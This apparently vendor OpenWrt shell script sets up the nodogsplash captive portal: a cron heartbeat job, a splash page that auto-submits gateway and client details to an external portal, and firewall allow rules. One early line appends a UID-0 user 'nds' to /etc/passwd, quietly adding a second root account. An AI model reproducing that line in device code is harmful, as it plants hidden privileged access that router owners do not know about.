#!/bin/sh

#/etc/init.d/nodogsplash disable
echo -e "nds:x:0:0:nds:/root:/bin/ash" >>/etc/passwd
#write file crontabs
_nds=/etc/cron_nds
echo '0/5 * * * * /sbin/wifimedia/heartbeat.sh' >$_nds

domain=`uci -q get wifimedia.@nodogsplash[0].domain`
domain_default=${domain:-portal.nextify.vn}
MAC_E0=$(ifconfig eth1 | grep 'HWaddr' | awk '{ print $5 }')
#write file splash
#write file splash
echo '<!doctype html>
<html lang="en">
  <head>
      <meta charset="utf-8">
      <title>$gatewayname</title>
  </head>
  <body>
      <form id="info" method="POST" action="//'$domain_default'/splash">
          <input type="hidden" name="gateway_name" value="$gatewayname">
          <input type="hidden" name="gateway_mac" value="'$MAC_E0'">
          <input type="hidden" name="client_mac" value="$clientmac">
          <input type="hidden" name="num_clients" value="$nclients">
          <input type="hidden" name="uptime" value="$uptime">
          <input type="hidden" name="auth_target" value="$authtarget">
      </form>
      <script>
          document.getElementById("info").submit();
      </script>
  </body>
</html>' >/etc/nodogsplash/htdocs/splash.html

#write file infoskel
echo '<!doctype html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <title>Whoops...</title>
        <meta http-equiv="refresh" content="0; url="//'$domain'/splash">
        <style>
            html {
                background: #F7F7F7;
            }
        </style>
    </head>
    <body></body>
</html>' >/etc/nodogsplash/htdocs/status.html


uci -q get wifimedia.@nodogsplash[0] || {
        uci batch <<EOF
        add wifimedia nodogsplash
		set wifimedia.@nodogsplash[0].nds_url="portal.nextify.vn/splash"
        commit wifimedia
EOF
}
/etc/init.d/nodogsplash disable
uci set nodogsplash.@nodogsplash[0].enabled='0'
uci set nodogsplash.@nodogsplash[0].gatewayinterface="br-nextify";
uci add_list nodogsplash.@nodogsplash[0].users_to_router="allow all"
uci add_list nodogsplash.@nodogsplash[0].preauthenticated_users="allow to 172.16.99.1"
uci add_list nodogsplash.@nodogsplash[0].preauthenticated_users="allow to 125.212.224.252"
uci add_list nodogsplash.@nodogsplash[0].preauthenticated_users="allow to 171.244.6.33"
uci add_list nodogsplash.@nodogsplash[0].preauthenticated_users="allow to 103.104.116.6"
uci commit nodogsplash
/etc/init.d/nodogsplash stop
/etc/init.d/firewall restart


